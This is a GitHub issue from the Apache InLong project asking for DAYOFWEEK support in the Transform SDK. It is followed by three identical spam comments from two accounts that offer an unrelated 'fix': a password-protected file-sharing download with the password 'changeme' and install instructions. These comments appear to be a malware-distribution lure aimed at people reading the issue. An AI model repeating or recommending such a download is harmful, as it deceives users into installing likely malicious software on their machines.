### ISSUE TITLE
[Feature][SDK] Transform support DAYOFWEEK function

### ISSUE THREAD

**Issue by ying-hua** [apache/inlong#10930]
### Description

- paretn #10796
- DAYOFWEEK(date)
Returns the day of a week (an integer between 1 and 7) from SQL date.
E.g., DAYOFWEEK(DATE ‘1994-09-27’) returns 3. (Tuesday)

### Are you willing to submit PR?

- [X] Yes, I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
